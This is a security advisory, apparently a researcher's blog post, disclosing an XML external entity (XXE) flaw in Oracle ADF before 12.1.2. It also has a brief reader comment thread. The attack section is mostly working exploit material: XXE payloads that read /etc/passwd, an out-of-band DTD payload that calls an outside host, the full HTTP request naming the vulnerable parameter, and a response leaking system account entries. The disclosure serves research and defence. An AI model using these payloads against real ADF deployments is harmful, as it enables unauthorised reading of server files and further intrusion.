Oracle ADF < 12.1.2 – XML External Entity Injection (XXE) Vulnerability
Product & Service Introduction;
In computing, Oracle Application Development Framework, usually called Oracle ADF, provides a commercial Java framework for building enterprise applications. It provides visual and declarative approaches to Java EE development. It supports rapid application development based on ready-to-use design patterns, metadata-driven and visual tools.
Exploitation Technique;
Remote, Authenticated
Affected Product;
Product; Oracle ADF < 12.1.2 http://www.oracle.com/technetwork/developer-tools/jdev/documentation/index.html http://www.oracle.com/technetwork/developer-tools/jdev/documentation/1213nf-2222743.html
TECHNICAL DETAILS
Payloads;
<!DOCTYPE foo [<!ENTITY xxe52640 SYSTEM "file:///etc/passwd"> ]> <!DOCTYPE%20m%20PUBLIC%20"-%2f%2fB%2fA%2fEN"%20"http%3a%2f%2fwww.runavea.com/xxe_test_uceka"><
Affected Parameter;
event.pt1:pt_it1
Request;
POST /***/?Adf-Window-Id=w2&Adf-Page-Id=4 HTTP/1.1 Host: www.hostname.com Content-Length: 14972 Adf-Ads-Page-Id: 6 Origin: http:// www.hostname.com User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 Adf-Rich-Message: true Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* DNT: 1 Referer: http://www.hostname.com/*** Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: telauraremember=false; JSESSIONID=B-VmvUq5YbSBb93IaheuiBOqZqu11xR6xJdkBUxDTFqSs1BTIoxn!-412599909 pt1:CURRENT_PAGE_NAME=HOME&pt1:pt_it1=%27&org.apache.myfaces.trinidad.faces.FORM=f1&Adf-Window-Id=w2&Adf-Page-Id=4& javax.faces.ViewState=H4sIAAAAAAAAAOV9C5QcV3VgTc9P%2F59tWf7IaluyR5I1Peqej6SRZXt%2BkgZmJGVmJBsbM67uqp4uq7qqp%2Br1TI% 2B9MoZdPoGQ7DohQBDBGIOBNQnEC%2FE6CZ84QJYTO8F8A% ...kesildi... %%3D&event=pt1%3Apt_it1&event.pt1:pt_it1=<!DOCTYPE%20foo%20[<!ENTITY%20xxe52640%20SYSTEM%20"file%3a%2f%2f%2fetc%2fpasswd">%20]> <m%20xmlns%3d"http%3a%2f%2foracle.com%2frichClient%2fcomm"><k%20v%3d"_custom"><b>1<%2fb><%2fk><k%20v%3d"submittedValue"><s> '%26xxe52640%3b<%2fs><%2fk><k%20v%3d"emptyText"><s>Sonu%c3%a7%20bulunamad%c4%b1.<%2fs><%2fk><k%20v%3d"maxSuggestedItems"><n>-1 <%2fn><%2fk><k%20v%3d"requestId"><n>1<%2fn><%2fk><k%20v%3d"immediate"><b>1<%2fb><%2fk><k%20v%3d"type"><s>_autoSuggest<%2fs><%2fk> <%2fm>&oracle.adf.view.rich.PROCESS=pt1%3Apt_it1
Response;
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: must-revalidate
…
…kesildi…
<?xml version="1.0" ?>
<partial-response><changes><update id="f1::postscript"><![CDATA[<span id="f1::postscript"><span id="f1::postscript:st"></span>
</span>]]></update><update id="javax.faces.ViewState"><![CDATA[H4sIAAAAAAAAAO29B2Acx3UwvHc4glVs6o2CREosIg/AoRIUJYEASEJEoQCQVLOhx
d0CWPHu9rC3RwBSJLe4x1WWbcV27LjJsdxiJe523GM7rnJvshM7juUex3JLLH/zZrbNzsw2HA6X/D9sDfe2zLz35rWZefPmLT+XVpV1ab+mz6TlkpydVdKFxWk5q5TThq
4W1ZycU4uGohflPHpeyqtZ2VC1Ynrc0CtZo6IrEvlLbJCkhZ
…kesildi…
</eval><eval><![CDATA[AdfPage.PAGE.setPageStateId("4");AdfPage.PAGE.__setUserInactivityTimeout(600000);AdfPage.PAGE.__
recordSessionTimeout(1200000, 120000, "http://www.hostname.com:80/***");AdfPage.PAGE.clearMessages();
AdfPage.PAGE.clearSubtreeMessages('pt1:pt_it1');]]></eval><eval>AdfAutoSuggestBehavior.showAutoSuggestPopup('pt1:pt_it1',
'\'root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:
/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:
/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\nnews:x:9:13:news:
/etc/news:\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames: ****
default operator:/home/opc_op:/bin/sh\n',{'':'Sonu\xe7 bulunamad\u0131.'},false,-1,false,1)</eval></changes></partial-response>
POC Video;
Remote interaction via XML injection;
https://drive.google.com/open?id=0B-LWHbwdK3P9eGZ2SE1fazNOOWc
Credits & Authors;
Ugur Cihan Koc
@_uceka_
http://www.uceka.com
uceka 
04 October 2018 at 19:47
Selam hocam, bu acikliga map eden bir CVE var mi?
08 December 2018 at 08:39
Selamlar, bu zafiyeti bildirdigimizde hizli bi fix ile kapatmışlardi. Daha sonra oracle tarafından bir cve alındığını görmedim. Oracle CPU da da yayınlanmadı.
16 November 2018 at 11:26
how to avoid such xml injactions from application?
08 December 2018 at 08:27
Hi, please follow the link for reference ;
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet